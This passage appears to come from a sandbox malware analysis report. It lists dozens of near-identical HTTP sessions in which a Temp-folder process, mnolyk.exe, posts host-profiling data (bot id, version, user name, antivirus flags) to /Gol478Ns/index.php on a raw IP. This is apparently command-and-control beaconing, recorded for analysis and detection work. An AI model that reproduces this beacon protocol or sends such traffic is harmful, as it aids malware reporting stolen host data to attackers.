                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.158956051 CET | 711 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        511 | 192.168.2.5 | 50201 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:05.341830969 CET | 711 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.408659935 CET | 712 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        512 | 192.168.2.5 | 50202 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:05.591073990 CET | 712 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.656107903 CET | 713 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        513 | 192.168.2.5 | 50203 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:05.828473091 CET | 713 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:05.892863035 CET | 714 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        514 | 192.168.2.5 | 50204 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:06.078376055 CET | 714 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.144231081 CET | 715 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        515 | 192.168.2.5 | 50205 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:06.323849916 CET | 715 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.389614105 CET | 716 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        516 | 192.168.2.5 | 50206 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:06.573237896 CET | 716 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.638559103 CET | 717 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        517 | 192.168.2.5 | 50207 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:06.819267988 CET | 717 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:06.884358883 CET | 718 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        518 | 192.168.2.5 | 50208 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:07.190881014 CET | 718 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:07.259404898 CET | 719 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        519 | 192.168.2.5 | 50209 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:07.475846052 CET | 719 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:07.542187929 CET | 720 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        52 | 192.168.2.5 | 49742 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:53.631836891 CET | 253 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:53.694607973 CET | 253 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        520 | 192.168.2.5 | 50210 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:07.790071011 CET | 720 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:07.856143951 CET | 721 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        521 | 192.168.2.5 | 50211 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:08.508471012 CET | 721 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:08.577630997 CET | 722 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        522 | 192.168.2.5 | 50212 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:08.785161972 CET | 722 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:08.850505114 CET | 723 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        523 | 192.168.2.5 | 50213 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:10.017712116 CET | 723 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.085311890 CET | 724 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        524 | 192.168.2.5 | 50214 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:10.427527905 CET | 724 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.492854118 CET | 724 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        525 | 192.168.2.5 | 50215 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:10.669292927 CET | 725 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.734399080 CET | 725 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        526 | 192.168.2.5 | 50216 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:10.901300907 CET | 726 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:10.965966940 CET | 726 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        527 | 192.168.2.5 | 50217 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:11.137962103 CET | 727 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:11.204516888 CET | 727 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        528 | 192.168.2.5 | 50218 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:11.381608963 CET | 728 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
